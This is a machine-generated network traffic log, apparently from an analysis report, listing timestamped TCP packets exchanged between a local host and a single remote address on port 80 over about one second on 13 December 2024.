                                          Dec 13, 2024 06:12:59.461545944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.461581945 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.461630106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.462347031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.462399960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.462444067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.462584019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.463242054 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.463301897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.463361025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.463406086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.464109898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.464159966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.464174032 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.464202881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.464977026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465037107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.465101004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465178967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.465853930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465909004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.465950966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465997934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.500999928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501096010 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501295090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.501383066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501480103 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501544952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.502257109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.502378941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.502433062 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.503133059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.503186941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.539782047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.539886951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.539971113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.540199041 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.540258884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.540297985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541096926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541162014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.541338921 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541387081 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.541423082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541738987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.542252064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.542296886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.542359114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.542402983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.543108940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.543154955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.543217897 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.543267012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.543978930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.544054031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.544121027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.544332027 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.544847012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.544908047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.545011044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.545058966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.545706987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.545758009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.545828104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.545877934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.546597004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.546683073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.546744108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.547458887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.547517061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.547557116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.547604084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.548321962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.548372984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.548485994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.548538923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.549202919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.549261093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.549278975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.549335957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.550069094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.550146103 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.550165892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.550307989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.550960064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.551009893 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.551049948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.551143885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.551814079 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.551872015 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.551911116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.552268028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.552731037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.552788019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.552818060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.552862883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.553554058 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.553627014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.553656101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.553847075 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.554451942 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.554503918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.554538965 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.554584980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.555316925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.555411100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.555465937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.556183100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.556231976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.556293964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557056904 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557106018 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.557141066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557466984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.557914019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557976961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.558006048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.558063030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.558808088 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.558897018 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.558918953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.558969021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.559679031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.559746981 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.559811115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.559973955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.560523033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.560597897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.560627937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.560674906 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.561395884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.561471939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.561506987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.561549902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.562252998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.562308073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.613790989 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.613857985 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.613913059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.613929033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.613979101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.614058971 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.614116907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.614671946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.614737034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.614789009 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.614840031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.615561008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.615612984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.615648031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.615694046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.616417885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.616471052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.616513014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.616559029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.617294073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.617368937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.617403984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.617455959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.618154049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.618211985 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.618279934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.618331909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.619035006 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.619158983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.619174957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.619209051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.619920015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620012999 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.620014906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620064020 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.620773077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620824099 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.620870113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.620914936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.621638060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.621690035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.621732950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.621790886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.622508049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.622612000 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.622659922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.623415947 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.623500109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.623514891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.623563051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.624253035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.624304056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.624320030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.624366999 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.650651932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.650854111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.650871992 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.650991917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651050091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651067019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651104927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651137114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651861906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651923895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.651941061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.651988983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.652729988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.652786016 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.652833939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.652962923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.653618097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.653731108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.653739929 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.653852940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.654484034 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.654550076 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.654591084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.654644966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.655368090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.655421972 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.655463934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.655528069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.656239033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.656294107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.656333923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.656387091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.657088041 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.657135010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.657171011 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.657216072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.657982111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.658030033 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.658071041 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.658173084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.692862988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.692967892 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.693025112 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.693182945 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.693295002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.693342924 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.693402052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.693854094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.694228888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.694284916 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.694309950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.694360971 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.695020914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.695075989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.731868982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.731940031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.732028008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.732094049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.732341051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.732397079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.732480049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.732532024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.733151913 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.733201027 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.733278036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.733333111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.734014034 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.734064102 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.734106064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.734152079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.734898090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.734961987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.735001087 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.735047102 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.735774994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.735831022 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.735869884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.735915899 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.736640930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.736732006 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.736757040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.736778021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.737499952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.737550974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.737632990 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.737682104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.738364935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.738413095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.738468885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.738517046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.739238977 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.739289045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.739336967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.739377022 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.740107059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.740155935 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.740219116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.740988970 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.741036892 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.741095066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.741848946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.741899967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.741967916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.742002964 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.742739916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.742836952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.742878914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.743627071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.743674994 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.743709087 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.743757010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.744476080 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.744556904 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.744568110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.744613886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.745363951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.745413065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.745484114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.745580912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.746244907 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.746292114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.746326923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.746468067 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.747124910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.747170925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.747210026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.747351885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.747973919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.748020887 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.748064041 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.748214006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.748825073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.748872042 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.748929977 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.748975992 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.749691963 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.749739885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.749783993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.749831915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.750576973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.750622034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.750701904 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.750782013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.751543045 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.751588106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.751622915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.751758099 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.752315998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.752374887 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.752414942 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.752460003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.753252029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.753427982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.753473043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.754070997 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.754142046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.754189968 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.805732965 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.805867910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.806010962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.806010962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.806154013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.806204081 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.806267023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.806314945 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.806822062 CET804978680.82.65.70192.168.2.5
